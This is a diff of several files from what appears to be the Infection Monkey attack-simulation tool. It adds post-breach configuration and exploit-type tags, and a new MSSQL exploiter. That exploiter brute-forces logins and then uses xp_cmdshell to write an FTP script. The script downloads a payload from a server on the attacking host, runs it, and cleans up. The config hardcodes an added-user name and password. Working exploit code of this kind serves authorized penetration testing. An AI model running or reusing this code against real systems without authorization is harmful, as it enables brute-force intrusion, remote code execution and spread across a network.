scanner_object = getattr(network_import, value)
|
|
||||||
setattr(self, key, scanner_object)
|
|
||||||
elif key == 'exploiter_classes':
|
elif key == 'exploiter_classes':
|
||||||
class_objects = [getattr(exploit_import, val) for val in value]
|
class_objects = [getattr(exploit_import, val) for val in value]
|
||||||
setattr(self, key, class_objects)
|
setattr(self, key, class_objects)
|
||||||
|
elif key == 'post_breach_actions':
|
||||||
|
class_objects = [getattr(post_breach_import, val) for val in value]
|
||||||
|
setattr(self, key, class_objects)
|
||||||
else:
|
else:
|
||||||
if hasattr(self, key):
|
if hasattr(self, key):
|
||||||
setattr(self, key, value)
|
setattr(self, key, value)
|
||||||
|
@ -133,7 +132,6 @@ class Configuration(object):
|
||||||
# how many scan iterations to perform on each run
|
# how many scan iterations to perform on each run
|
||||||
max_iterations = 1
|
max_iterations = 1
|
||||||
|
|
||||||
scanner_class = None
|
|
||||||
finger_classes = []
|
finger_classes = []
|
||||||
exploiter_classes = []
|
exploiter_classes = []
|
||||||
|
|
||||||
|
@ -163,6 +161,10 @@ class Configuration(object):
|
||||||
|
|
||||||
keep_tunnel_open_time = 60
|
keep_tunnel_open_time = 60
|
||||||
|
|
||||||
|
# Monkey files directories
|
||||||
|
monkey_dir_linux = '/tmp/monkey_dir'
|
||||||
|
monkey_dir_windows = r'C:\Windows\Temp\monkey_dir'
|
||||||
|
|
||||||
###########################
|
###########################
|
||||||
# scanners config
|
# scanners config
|
||||||
###########################
|
###########################
|
||||||
|
@ -193,7 +195,7 @@ class Configuration(object):
|
||||||
9200]
|
9200]
|
||||||
tcp_target_ports.extend(HTTP_PORTS)
|
tcp_target_ports.extend(HTTP_PORTS)
|
||||||
tcp_scan_timeout = 3000 # 3000 Milliseconds
|
tcp_scan_timeout = 3000 # 3000 Milliseconds
|
||||||
tcp_scan_interval = 200
|
tcp_scan_interval = 0
|
||||||
tcp_scan_get_banner = True
|
tcp_scan_get_banner = True
|
||||||
|
|
||||||
# Ping Scanner
|
# Ping Scanner
|
||||||
|
@ -206,8 +208,8 @@ class Configuration(object):
|
||||||
skip_exploit_if_file_exist = False
|
skip_exploit_if_file_exist = False
|
||||||
|
|
||||||
ms08_067_exploit_attempts = 5
|
ms08_067_exploit_attempts = 5
|
||||||
ms08_067_remote_user_add = "Monkey_IUSER_SUPPORT"
|
user_to_add = "Monkey_IUSER_SUPPORT"
|
||||||
ms08_067_remote_user_pass = "Password1!"
|
remote_user_pass = "Password1!"
|
||||||
|
|
||||||
# rdp exploiter
|
# rdp exploiter
|
||||||
rdp_use_vbs_download = True
|
rdp_use_vbs_download = True
|
||||||
|
@ -268,5 +270,11 @@ class Configuration(object):
|
||||||
|
|
||||||
extract_azure_creds = True
|
extract_azure_creds = True
|
||||||
|
|
||||||
|
post_breach_actions = []
|
||||||
|
custom_PBA_linux_cmd = ""
|
||||||
|
custom_PBA_windows_cmd = ""
|
||||||
|
PBA_linux_filename = None
|
||||||
|
PBA_windows_filename = None
|
||||||
|
|
||||||
|
|
||||||
WormConfiguration = Configuration()
|
WormConfiguration = Configuration()
|
||||||
|
|
|
@ -8,7 +8,7 @@
|
||||||
],
|
],
|
||||||
"keep_tunnel_open_time": 60,
|
"keep_tunnel_open_time": 60,
|
||||||
"subnet_scan_list": [
|
"subnet_scan_list": [
|
||||||
|
|
||||||
],
|
],
|
||||||
"inaccessible_subnets": [],
|
"inaccessible_subnets": [],
|
||||||
"blocked_ips": [],
|
"blocked_ips": [],
|
||||||
|
@ -28,6 +28,9 @@
|
||||||
"dropper_target_path_win_64": "C:\\Windows\\monkey64.exe",
|
"dropper_target_path_win_64": "C:\\Windows\\monkey64.exe",
|
||||||
"dropper_target_path_linux": "/tmp/monkey",
|
"dropper_target_path_linux": "/tmp/monkey",
|
||||||
|
|
||||||
|
monkey_dir_linux = '/tmp/monkey_dir',
|
||||||
|
monkey_dir_windows = r'C:\Windows\Temp\monkey_dir',
|
||||||
|
|
||||||
|
|
||||||
"kill_file_path_linux": "/var/run/monkey.not",
|
"kill_file_path_linux": "/var/run/monkey.not",
|
||||||
"kill_file_path_windows": "%windir%\\monkey.not",
|
"kill_file_path_windows": "%windir%\\monkey.not",
|
||||||
|
@ -57,14 +60,13 @@
|
||||||
"monkey_log_path_linux": "/tmp/user-1563",
|
"monkey_log_path_linux": "/tmp/user-1563",
|
||||||
"send_log_to_server": true,
|
"send_log_to_server": true,
|
||||||
"ms08_067_exploit_attempts": 5,
|
"ms08_067_exploit_attempts": 5,
|
||||||
"ms08_067_remote_user_add": "Monkey_IUSER_SUPPORT",
|
"user_to_add": "Monkey_IUSER_SUPPORT",
|
||||||
"ms08_067_remote_user_pass": "Password1!",
|
"remote_user_pass": "Password1!",
|
||||||
"ping_scan_timeout": 10000,
|
"ping_scan_timeout": 10000,
|
||||||
"rdp_use_vbs_download": true,
|
"rdp_use_vbs_download": true,
|
||||||
"smb_download_timeout": 300,
|
"smb_download_timeout": 300,
|
||||||
"smb_service_name": "InfectionMonkey",
|
"smb_service_name": "InfectionMonkey",
|
||||||
"retry_failed_explotation": true,
|
"retry_failed_explotation": true,
|
||||||
"scanner_class": "TcpScanner",
|
|
||||||
"self_delete_in_cleanup": true,
|
"self_delete_in_cleanup": true,
|
||||||
"serialize_config": false,
|
"serialize_config": false,
|
||||||
"singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}",
|
"singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}",
|
||||||
|
@ -79,7 +81,7 @@
|
||||||
"sambacry_shares_not_to_check": ["IPC$", "print$"],
|
"sambacry_shares_not_to_check": ["IPC$", "print$"],
|
||||||
"local_network_scan": false,
|
"local_network_scan": false,
|
||||||
"tcp_scan_get_banner": true,
|
"tcp_scan_get_banner": true,
|
||||||
"tcp_scan_interval": 200,
|
"tcp_scan_interval": 0,
|
||||||
"tcp_scan_timeout": 10000,
|
"tcp_scan_timeout": 10000,
|
||||||
"tcp_target_ports": [
|
"tcp_target_ports": [
|
||||||
22,
|
22,
|
||||||
|
@ -97,5 +99,10 @@
|
||||||
"timeout_between_iterations": 10,
|
"timeout_between_iterations": 10,
|
||||||
"use_file_logging": true,
|
"use_file_logging": true,
|
||||||
"victims_max_exploit": 7,
|
"victims_max_exploit": 7,
|
||||||
"victims_max_find": 30
|
"victims_max_find": 30,
|
||||||
|
"post_breach_actions" : []
|
||||||
|
custom_PBA_linux_cmd = ""
|
||||||
|
custom_PBA_windows_cmd = ""
|
||||||
|
PBA_linux_filename = None
|
||||||
|
PBA_windows_filename = None
|
||||||
}
|
}
|
||||||
|
|
|
@ -1,5 +1,6 @@
|
||||||
from abc import ABCMeta, abstractmethod
|
from abc import ABCMeta, abstractmethod
|
||||||
import infection_monkey.config
|
import infection_monkey.config
|
||||||
|
from common.utils.exploit_enum import ExploitType
|
||||||
|
|
||||||
__author__ = 'itamar'
|
__author__ = 'itamar'
|
||||||
|
|
||||||
|
@ -9,6 +10,9 @@ class HostExploiter(object):
|
||||||
|
|
||||||
_TARGET_OS_TYPE = []
|
_TARGET_OS_TYPE = []
|
||||||
|
|
||||||
|
# Usual values are 'vulnerability' or 'brute_force'
|
||||||
|
EXPLOIT_TYPE = ExploitType.VULNERABILITY
|
||||||
|
|
||||||
def __init__(self, host):
|
def __init__(self, host):
|
||||||
self._config = infection_monkey.config.WormConfiguration
|
self._config = infection_monkey.config.WormConfiguration
|
||||||
self._exploit_info = {}
|
self._exploit_info = {}
|
||||||
|
@ -45,3 +49,4 @@ from infection_monkey.exploit.elasticgroovy import ElasticGroovyExploiter
|
||||||
from infection_monkey.exploit.struts2 import Struts2Exploiter
|
from infection_monkey.exploit.struts2 import Struts2Exploiter
|
||||||
from infection_monkey.exploit.weblogic import WebLogicExploiter
|
from infection_monkey.exploit.weblogic import WebLogicExploiter
|
||||||
from infection_monkey.exploit.hadoop import HadoopExploiter
|
from infection_monkey.exploit.hadoop import HadoopExploiter
|
||||||
|
from infection_monkey.exploit.mssqlexec import MSSQLExploiter
|
||||||
|
|
|
@ -8,7 +8,8 @@ import json
|
||||||
import logging
|
import logging
|
||||||
import requests
|
import requests
|
||||||
from infection_monkey.exploit.web_rce import WebRCE
|
from infection_monkey.exploit.web_rce import WebRCE
|
||||||
from infection_monkey.model import WGET_HTTP_UPLOAD, RDP_CMDLINE_HTTP
|
from infection_monkey.model import WGET_HTTP_UPLOAD, RDP_CMDLINE_HTTP, CHECK_COMMAND, ID_STRING, CMD_PREFIX,\
|
||||||
|
DOWNLOAD_TIMEOUT
|
||||||
from infection_monkey.network.elasticfinger import ES_PORT, ES_SERVICE
|
from infection_monkey.network.elasticfinger import ES_PORT, ES_SERVICE
|
||||||
|
|
||||||
import re
|
import re
|
||||||
|
@ -34,7 +35,7 @@ class ElasticGroovyExploiter(WebRCE):
|
||||||
exploit_config = super(ElasticGroovyExploiter, self).get_exploit_config()
|
exploit_config = super(ElasticGroovyExploiter, self).get_exploit_config()
|
||||||
exploit_config['dropper'] = True
|
exploit_config['dropper'] = True
|
||||||
exploit_config['url_extensions'] = ['_search?pretty']
|
exploit_config['url_extensions'] = ['_search?pretty']
|
||||||
exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': RDP_CMDLINE_HTTP}
|
exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': CMD_PREFIX+" "+RDP_CMDLINE_HTTP}
|
||||||
return exploit_config
|
return exploit_config
|
||||||
|
|
||||||
def get_open_service_ports(self, port_list, names):
|
def get_open_service_ports(self, port_list, names):
|
||||||
|
@ -47,7 +48,11 @@ class ElasticGroovyExploiter(WebRCE):
|
||||||
def exploit(self, url, command):
|
def exploit(self, url, command):
|
||||||
command = re.sub(r"\\", r"\\\\\\\\", command)
|
command = re.sub(r"\\", r"\\\\\\\\", command)
|
||||||
payload = self.JAVA_CMD % command
|
payload = self.JAVA_CMD % command
|
||||||
response = requests.get(url, data=payload)
|
try:
|
||||||
|
response = requests.get(url, data=payload, timeout=DOWNLOAD_TIMEOUT)
|
||||||
|
except requests.ReadTimeout:
|
||||||
|
LOG.error("Elastic couldn't upload monkey, because server didn't respond to upload request.")
|
||||||
|
return False
|
||||||
result = self.get_results(response)
|
result = self.get_results(response)
|
||||||
if not result:
|
if not result:
|
||||||
return False
|
return False
|
||||||
|
@ -63,3 +68,20 @@ class ElasticGroovyExploiter(WebRCE):
|
||||||
return json_resp['hits']['hits'][0]['fields'][self.MONKEY_RESULT_FIELD]
|
return json_resp['hits']['hits'][0]['fields'][self.MONKEY_RESULT_FIELD]
|
||||||
except (KeyError, IndexError):
|
except (KeyError, IndexError):
|
||||||
return None
|
return None
|
||||||
|
|
||||||
|
def check_if_exploitable(self, url):
|
||||||
|
# Overridden web_rce method that adds CMD prefix for windows command
|
||||||
|
try:
|
||||||
|
if 'windows' in self.host.os['type']:
|
||||||
|
resp = self.exploit(url, CMD_PREFIX+" "+CHECK_COMMAND)
|
||||||
|
else:
|
||||||
|
resp = self.exploit(url, CHECK_COMMAND)
|
||||||
|
if resp is True:
|
||||||
|
return True
|
||||||
|
elif resp is not False and ID_STRING in resp:
|
||||||
|
return True
|
||||||
|
else:
|
||||||
|
return False
|
||||||
|
except Exception as e:
|
||||||
|
LOG.error("Host's exploitability check failed due to: %s" % e)
|
||||||
|
return False
|
||||||
|
|
|
@ -36,6 +36,9 @@ class HadoopExploiter(WebRCE):
|
||||||
self.add_vulnerable_urls(urls, True)
|
self.add_vulnerable_urls(urls, True)
|
||||||
if not self.vulnerable_urls:
|
if not self.vulnerable_urls:
|
||||||
return False
|
return False
|
||||||
|
# We presume hadoop works only on 64-bit machines
|
||||||
|
if self.host.os['type'] == 'windows':
|
||||||
|
self.host.os['machine'] = '64'
|
||||||
paths = self.get_monkey_paths()
|
paths = self.get_monkey_paths()
|
||||||
if not paths:
|
if not paths:
|
||||||
return False
|
return False
|
||||||
|
|
|
@ -0,0 +1,130 @@
|
||||||
|
import os
|
||||||
|
import logging
|
||||||
|
|
||||||
|
import pymssql
|
||||||
|
|
||||||
|
from infection_monkey.exploit import HostExploiter, mssqlexec_utils
|
||||||
|
from common.utils.exploit_enum import ExploitType
|
||||||
|
|
||||||
|
__author__ = 'Maor Rayzin'
|
||||||
|
|
||||||
|
LOG = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
|
class MSSQLExploiter(HostExploiter):
|
||||||
|
|
||||||
|
_TARGET_OS_TYPE = ['windows']
|
||||||
|
EXPLOIT_TYPE = ExploitType.BRUTE_FORCE
|
||||||
|
LOGIN_TIMEOUT = 15
|
||||||
|
SQL_DEFAULT_TCP_PORT = '1433'
|
||||||
|
DEFAULT_PAYLOAD_PATH_WIN = os.path.expandvars(r'~PLD123.bat')
|
||||||
|
DEFAULT_PAYLOAD_PATH_LINUX = '~PLD123.bat'
|
||||||
|
|
||||||
|
def __init__(self, host):
|
||||||
|
super(MSSQLExploiter, self).__init__(host)
|
||||||
|
self.attacks_list = [mssqlexec_utils.CmdShellAttack]
|
||||||
|
|
||||||
|
def create_payload_file(self, payload_path):
|
||||||
|
"""
|
||||||
|
This function creates dynamically the payload file to be transported and ran on the exploited machine.
|
||||||
|
:param payload_path: A path to the create the payload file in
|
||||||
|
:return: True if the payload file was created and false otherwise.
|
||||||
|
"""
|
||||||
|
try:
|
||||||
|
with open(payload_path, 'w+') as payload_file:
|
||||||
|
payload_file.write('dir C:\\')
|
||||||
|
return True
|
||||||
|
except Exception as e:
|
||||||
|
LOG.error("Payload file couldn't be created", exc_info=True)
|
||||||
|
return False
|
||||||
|
|
||||||
|
def exploit_host(self):
|
||||||
|
"""
|
||||||
|
Main function of the mssql brute force
|
||||||
|
Return:
|
||||||
|
True or False depends on process success
|
||||||
|
"""
|
||||||
|
username_passwords_pairs_list = self._config.get_exploit_user_password_pairs()
|
||||||
|
|
||||||
|
payload_path = MSSQLExploiter.DEFAULT_PAYLOAD_PATH_LINUX if 'linux' in self.host.os['type'] \
|
||||||
|
else MSSQLExploiter.DEFAULT_PAYLOAD_PATH_WIN
|
||||||
|
|
||||||
|
if not self.create_payload_file(payload_path):
|
||||||
|
return False
|
||||||
|
if self.brute_force_begin(self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, username_passwords_pairs_list,
|
||||||
|
payload_path):
|
||||||
|
LOG.debug("Bruteforce was a success on host: {0}".format(self.host.ip_addr))
|
||||||
|
return True
|
||||||
|
else:
|
||||||
|
LOG.error("Bruteforce process failed on host: {0}".format(self.host.ip_addr))
|
||||||
|
return False
|
||||||
|
|
||||||
|
def handle_payload(self, cursor, payload):
|
||||||
|
"""
|
||||||
|
Handles the process of payload sending and execution, prepares the attack and details.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
cursor (pymssql.conn.cursor obj): A cursor of a connected pymssql.connect obj to user for commands.
|
||||||
|
payload (string): Payload path
|
||||||
|
|
||||||
|
Return:
|
||||||
|
True or False depends on process success
|
||||||
|
"""
|
||||||
|
|
||||||
|
chosen_attack = self.attacks_list[0](payload, cursor, self.host)
|
||||||
|
|
||||||
|
if chosen_attack.send_payload():
|
||||||
|
LOG.debug('Payload: {0} has been successfully sent to host'.format(payload))
|
||||||
|
if chosen_attack.execute_payload():
|
||||||
|
LOG.debug('Payload: {0} has been successfully executed on host'.format(payload))
|
||||||
|
chosen_attack.cleanup_files()
|
||||||
|
return True
|
||||||
|
else:
|
||||||
|
LOG.error("Payload: {0} couldn't be executed".format(payload))
|
||||||
|
else:
|
||||||
|
LOG.error("Payload: {0} couldn't be sent to host".format(payload))
|
||||||
|
|
||||||
|
chosen_attack.cleanup_files()
|
||||||
|
return False
|
||||||
|
|
||||||
|
def brute_force_begin(self, host, port, users_passwords_pairs_list, payload):
|
||||||
|
"""
|
||||||
|
Starts the brute force connection attempts and if needed then init the payload process.
|
||||||
|
Main loop starts here.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
host (str): Host ip address
|
||||||
|
port (str): Tcp port that the host listens to
|
||||||
|
payload (str): Local path to the payload
|
||||||
|
users_passwords_pairs_list (list): a list of users and passwords pairs to bruteforce with
|
||||||
|
|
||||||
|
Return:
|
||||||
|
True or False depends if the whole bruteforce and attack process was completed successfully or not
|
||||||
|
"""
|
||||||
|
# Main loop
|
||||||
|
# Iterates on users list
|
||||||
|
for user, password in users_passwords_pairs_list:
|
||||||
|
try:
|
||||||
|
# Core steps
|
||||||
|
# Trying to connect
|
||||||
|
conn = pymssql.connect(host, user, password, port=port, login_timeout=self.LOGIN_TIMEOUT)
|
||||||
|
LOG.info('Successfully connected to host: {0}, '
|
||||||
|
'using user: {1}, password: {2}'.format(host, user, password))
|
||||||
|
self.report_login_attempt(True, user, password)
|
||||||
|
cursor = conn.cursor()
|
||||||
|
|
||||||
|
# Handles the payload and return True or False
|
||||||
|
if self.handle_payload(cursor, payload):
|
||||||
|
LOG.debug("Successfully sent and executed payload: {0} on host: {1}".format(payload, host))
|
||||||
|
return True
|
||||||
|
else:
|
||||||
|
LOG.warning("user: {0} and password: {1}, "
|
||||||
|
"was able to connect to host: {2} but couldn't handle payload: {3}"
|
||||||
|
.format(user, password, host, payload))
|
||||||
|
except pymssql.OperationalError:
|
||||||
|
# Combo didn't work, hopping to the next one
|
||||||
|
pass
|
||||||
|
|
||||||
|
LOG.warning('No user/password combo was able to connect to host: {0}:{1}, '
|
||||||
|
'aborting brute force'.format(host, port))
|
||||||
|
return False
|
|
@ -0,0 +1,208 @@
|
||||||
|
import os
|
||||||
|
import multiprocessing
|
||||||
|
import logging
|
||||||
|
|
||||||
|
import pymssql
|
||||||
|
|
||||||
|
from infection_monkey.exploit.tools import get_interface_to_target
|
||||||
|
from pyftpdlib.authorizers import DummyAuthorizer
|
||||||
|
from pyftpdlib.handlers import FTPHandler
|
||||||
|
from pyftpdlib.servers import FTPServer
|
||||||
|
from time import sleep
|
||||||
|
|
||||||
|
|
||||||
|
__author__ = 'Maor Rayzin'
|
||||||
|
|
||||||
|
|
||||||
|
FTP_SERVER_PORT = 1026
|
||||||
|
FTP_SERVER_ADDRESS = ''
|
||||||
|
FTP_SERVER_USER = 'brute'
|
||||||
|
FTP_SERVER_PASSWORD = 'force'
|
||||||
|
FTP_WORK_DIR_WINDOWS = os.path.expandvars(r'%TEMP%/')
|
||||||
|
FTP_WORK_DIR_LINUX = '/tmp/'
|
||||||
|
|
||||||
|
LOG = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
|
class FTP(object):
|
||||||
|
|
||||||
|
"""Configures and establish an FTP server with default details.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
user (str): User for FTP server auth
|
||||||
|
password (str): Password for FTP server auth
|
||||||
|
working_dir (str): The local working dir to init the ftp server on.
|
||||||
|
"""
|
||||||
|
|
||||||
|
def __init__(self, host, user=FTP_SERVER_USER, password=FTP_SERVER_PASSWORD):
|
||||||
|
"""Look at class level docstring."""
|
||||||
|
self.dst_ip = host.ip_addr
|
||||||
|
self.user = user
|
||||||
|
self.password = password
|
||||||
|
self.working_dir = FTP_WORK_DIR_LINUX if 'linux' in host.os['type'] else FTP_WORK_DIR_WINDOWS
|
||||||
|
|
||||||
|
def run_server(self):
|
||||||
|
|
||||||
|
""" Configures and runs the ftp server to listen forever until stopped.
|
||||||
|
"""
|
||||||
|
|
||||||
|
# Defining an authorizer and configuring the ftp user
|
||||||
|
authorizer = DummyAuthorizer()
|
||||||
|
authorizer.add_user(self.user, self.password, self.working_dir, perm='elr')
|
||||||
|
|
||||||
|
# Normal ftp handler
|
||||||
|
handler = FTPHandler
|
||||||
|
handler.authorizer = authorizer
|
||||||
|
|
||||||
|
address = (get_interface_to_target(self.dst_ip), FTP_SERVER_PORT)
|
||||||
|
|
||||||
|
# Configuring the server using the address and handler. Global usage in stop_server thats why using self keyword
|
||||||
|
self.server = FTPServer(address, handler)
|
||||||
|
|
||||||
|
# Starting ftp server, this server has no auto stop or stop clause, and also, its blocking on use, thats why I
|
||||||
|
# multiproccess is being used here.
|
||||||
|
self.server.serve_forever()
|
||||||
|
|
||||||
|
def stop_server(self):
|
||||||
|
# Stops the FTP server and closing all connections.
|
||||||
|
self.server.close_all()
|
||||||
|
|
||||||
|
|
||||||
|
class AttackHost(object):
|
||||||
|
"""
|
||||||
|
This class acts as an interface for the attacking methods class
|
||||||
|
|
||||||
|
Args:
|
||||||
|
payload_path (str): The local path of the payload file
|
||||||
|
"""
|
||||||
|
|
||||||
|
def __init__(self, payload_path):
|
||||||
|
self.payload_path = payload_path
|
||||||
|
|
||||||
|
def send_payload(self):
|
||||||
|
raise NotImplementedError("Send function not implemented")
|
||||||
|
|
||||||
|
def execute_payload(self):
|
||||||
|
raise NotImplementedError("execute function not implemented")
|
||||||
|
|
||||||
|
|
||||||
|
class CmdShellAttack(AttackHost):
|
||||||
|
|
||||||
|
"""
|
||||||
|
This class uses the xp_cmdshell command execution and will work only if its available on the remote host.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
payload_path (str): The local path of the payload file
|
||||||
|
cursor (pymssql.conn.obj): A cursor object from pymssql.connect to run commands with.
|
||||||
|
host (model.host.VictimHost): Host this attack is going to target
|
||||||
|
|
||||||
|
"""
|
||||||
|
|
||||||
|
def __init__(self, payload_path, cursor, host):
|
||||||
|
super(CmdShellAttack, self).__init__(payload_path)
|
||||||
|
self.ftp_server, self.ftp_server_p = self.__init_ftp_server(host)
|
||||||
|
self.cursor = cursor
|
||||||
|
self.attacker_ip = get_interface_to_target(host.ip_addr)
|
||||||
|
|
||||||
|
def send_payload(self):
|
||||||
|
"""
|
||||||
|
Sets up an FTP server and using it to download the payload to the remote host
|
||||||
|
|
||||||
|
Return:
|
||||||
|
True if payload sent False if not.
|
||||||
|
"""
|
||||||
|
|
||||||
|
# Sets up the cmds to run
|
||||||
|
shellcmd1 = """xp_cmdshell "mkdir c:\\tmp& chdir c:\\tmp& echo open {0} {1}>ftp.txt& \
|
||||||
|
echo {2}>>ftp.txt" """.format(self.attacker_ip, FTP_SERVER_PORT, FTP_SERVER_USER)
|
||||||
|
shellcmd2 = """xp_cmdshell "chdir c:\\tmp& echo {0}>>ftp.txt" """.format(FTP_SERVER_PASSWORD)
|
||||||
|
shellcmd3 = """xp_cmdshell "chdir c:\\tmp& echo get {0}>>ftp.txt& echo bye>>ftp.txt" """\
|
||||||
|
.format(self.payload_path)
|
||||||
|
shellcmd4 = """xp_cmdshell "chdir c:\\tmp& cmd /c ftp -s:ftp.txt" """
|
||||||
|
shellcmds = [shellcmd1, shellcmd2, shellcmd3, shellcmd4]
|
||||||
|
|
||||||
|
# Checking to see if ftp server is up
|
||||||
|
if self.ftp_server_p and self.ftp_server:
|
||||||
|
try:
|
||||||
|
# Running the cmd on remote host
|
||||||
|
for cmd in shellcmds:
|
||||||
|
self.cursor.execute(cmd)
|
||||||
|
sleep(0.5)
|
||||||
|
except Exception as e:
|
||||||
|
LOG.error('Error sending the payload using xp_cmdshell to host', exc_info=True)
|
||||||
|
self.ftp_server_p.terminate()
|
||||||
|
return False
|
||||||
|
return True
|
||||||
|
else:
|
||||||
|
LOG.error("Couldn't establish an FTP server for the dropout")
|
||||||
|
return False
|
||||||
|
|
||||||
|
def execute_payload(self):
|
||||||
|
|
||||||
|
"""
|
||||||
|
Executes the payload after ftp drop
|
||||||
|
|
||||||
|
Return:
|
||||||
|
True if payload was executed successfully, False if not.
|
||||||
|
"""
|
||||||
|
|
||||||
|
# Getting the payload's file name
|
||||||
|
payload_file_name = os.path.split(self.payload_path)[1]
|
||||||
|
|
||||||
|
# Preparing the cmd to run on remote, using no_output so I can capture exit code: 0 -> success, 1 -> error.
|
||||||
|
shellcmd = """DECLARE @i INT \
|
||||||
|
EXEC @i=xp_cmdshell "chdir C:\\& C:\\tmp\\{0}", no_output \
|
||||||
|
SELECT @i """.format(payload_file_name)
|
||||||
|
|
||||||
|
try:
|
||||||
|
# Executing payload on remote host
|
||||||
|
LOG.debug('Starting execution process of payload: {0} on remote host'.format(payload_file_name))
|
||||||
|
self.cursor.execute(shellcmd)
|
||||||
|
if self.cursor.fetchall()[0][0] == 0:
|
||||||
|
# Success
|
||||||
|
self.ftp_server_p.terminate()
|
||||||
|
LOG.debug('Payload: {0} execution on remote host was a success'.format(payload_file_name))
|
||||||
|
return True
|
||||||
|
else:
|
||||||
|
LOG.warning('Payload: {0} execution on remote host failed'.format(payload_file_name))
|
||||||
|
self.ftp_server_p.terminate()
|
||||||
|
return False
|
||||||
|
|
||||||
|
except pymssql.OperationalError as e:
|
||||||
|
LOG.error('Executing payload: {0} failed'.format(payload_file_name), exc_info=True)
|
||||||
|
self.ftp_server_p.terminate()
|
||||||
|
return False
|
||||||
|
|
||||||
|
def cleanup_files(self):
|
||||||
|
"""
|
||||||
|
Cleans up the folder with the attack related files (C:\\tmp by default)
|
||||||
|
:return: True or False if command executed or not.
|
||||||
|
"""
|
||||||
|
cleanup_command = """xp_cmdshell "rd /s /q c:\\tmp" """
|
||||||
|
try:
|
||||||
|
self.cursor.execute(cleanup_command)
|
||||||
|
LOG.info('Attack files cleanup command has been sent.')
|
||||||
|
return True
|
||||||
|
except Exception as e:
|
||||||
|
LOG.error('Error cleaning the attack files using xp_cmdshell, files may remain on host', exc_info=True)
|
||||||
|
return False
|
||||||
|
|
||||||
|
def __init_ftp_server(self, host):
|
||||||
|
"""
|
||||||
|
Init an FTP server using FTP class on a different process
|
||||||
|
|
||||||
|
Return:
|
||||||
|
ftp_s: FTP server object
|
||||||
|
p: the process obj of the FTP object
|
||||||
|
"""
|
||||||
|
|
||||||
|
try:
|
||||||
|
ftp_s = FTP(host)
|
||||||
|
multiprocessing.log_to_stderr(logging.DEBUG)
|
||||||
|
p = multiprocessing.Process(target=ftp_s.run_server)
|
||||||
|
p.start()
|
||||||
|
LOG.debug('Successfully established an FTP server in another process: {0}, {1}'.format(ftp_s, p.name))
|
||||||
|
return ftp_s, p
|
||||||
|
except Exception as e:
|
||||||
|
LOG.error('Exception raised while trying to pull up the ftp server', exc_info=True)
|
||||||
|
return None, None
|
|
@ -16,6 +16,7 @@ from infection_monkey.model import RDP_CMDLINE_HTTP_BITS, RDP_CMDLINE_HTTP_VBS
|
||||||
from infection_monkey.network.tools import check_tcp_port
|
from infection_monkey.network.tools import check_tcp_port
|
||||||
from infection_monkey.exploit.tools import build_monkey_commandline
|
from infection_monkey.exploit.tools import build_monkey_commandline
|
||||||
from infection_monkey.utils import utf_to_ascii
|
from infection_monkey.utils import utf_to_ascii
|
||||||
|
from common.utils.exploit_enum import ExploitType
|
||||||
|
|
||||||
__author__ = 'hoffer'
|
__author__ = 'hoffer'
|
||||||
|
|
||||||
|
@ -235,6 +236,7 @@ class CMDClientFactory(rdp.ClientFactory):
|
||||||
class RdpExploiter(HostExploiter):
|
class RdpExploiter(HostExploiter):
|
||||||
|
|
||||||
_TARGET_OS_TYPE = ['windows']
|
_TARGET_OS_TYPE = ['windows']
|
||||||
|
EXPLOIT_TYPE = ExploitType.BRUTE_FORCE
|
||||||
|
|
||||||
def __init__(self, host):
|
def __init__(self, host):
|
||||||
super(RdpExploiter, self).__init__(host)
|
super(RdpExploiter, self).__init__(host)
|
||||||
|
|
|
@ -7,6 +7,7 @@ from io import BytesIO
|
||||||
from os import path
|
from os import path
|
||||||
|
|
||||||
import impacket.smbconnection
|
import impacket.smbconnection
|
||||||
|
from impacket.nmb import NetBIOSError
|
||||||
from impacket.nt_errors import STATUS_SUCCESS
|
from impacket.nt_errors import STATUS_SUCCESS
|
||||||
from impacket.smb import FILE_OPEN, SMB_DIALECT, SMB, SMBCommand, SMBNtCreateAndX_Parameters, SMBNtCreateAndX_Data, \
|
from impacket.smb import FILE_OPEN, SMB_DIALECT, SMB, SMBCommand, SMBNtCreateAndX_Parameters, SMBNtCreateAndX_Data, \
|
||||||
FILE_READ_DATA, FILE_SHARE_READ, FILE_NON_DIRECTORY_FILE, FILE_WRITE_DATA, FILE_DIRECTORY_FILE
|
FILE_READ_DATA, FILE_SHARE_READ, FILE_NON_DIRECTORY_FILE, FILE_WRITE_DATA, FILE_DIRECTORY_FILE
|
||||||
|
@ -172,7 +173,7 @@ class SambaCryExploiter(HostExploiter):
|
||||||
if self.is_share_writable(smb_client, share):
|
if self.is_share_writable(smb_client, share):
|
||||||
writable_shares_creds_dict[share] = credentials
|
writable_shares_creds_dict[share] = credentials
|
||||||
|
|
||||||
except (impacket.smbconnection.SessionError, SessionError):
|
except (impacket.smbconnection.SessionError, SessionError, NetBIOSError):
|
||||||
# If failed using some credentials, try others.
|
# If failed using some credentials, try others.
|
||||||
pass
|
pass
|
||||||
|
|
||||||
|
|
|
@ -9,12 +9,14 @@ from infection_monkey.model import MONKEY_CMDLINE_DETACHED_WINDOWS, DROPPER_CMDL
|
||||||
from infection_monkey.network import SMBFinger
|
from infection_monkey.network import SMBFinger
|
||||||
from infection_monkey.network.tools import check_tcp_port
|
from infection_monkey.network.tools import check_tcp_port
|
||||||
from infection_monkey.exploit.tools import build_monkey_commandline
|
from infection_monkey.exploit.tools import build_monkey_commandline
|
||||||
|
from common.utils.exploit_enum import ExploitType
|
||||||
|
|
||||||
LOG = getLogger(__name__)
|
LOG = getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
class SmbExploiter(HostExploiter):
|
class SmbExploiter(HostExploiter):
|
||||||
_TARGET_OS_TYPE = ['windows']
|
_TARGET_OS_TYPE = ['windows']
|
||||||
|
EXPLOIT_TYPE = ExploitType.BRUTE_FORCE
|
||||||
KNOWN_PROTOCOLS = {
|
KNOWN_PROTOCOLS = {
|
||||||
'139/SMB': (r'ncacn_np:%s[\pipe\svcctl]', 139),
|
'139/SMB': (r'ncacn_np:%s[\pipe\svcctl]', 139),
|
